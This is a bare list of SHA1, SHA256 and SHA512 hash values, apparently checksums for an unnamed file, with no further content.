SHA1: 75457e8a9d40a5a63e72bc80c5ec974761185898
SHA256: 181ae1748ee78f79f3fb2956a71ba0959082b9e67f2a72dc2b459110bb2be859
SHA512: a2252651ea91142e9a21896455b43f7162c15992bef62725af6201f5cacbc5f3c646e465c6e311a9a261549092b59c659e4b23ee940ea7af04e373b7d4564e1b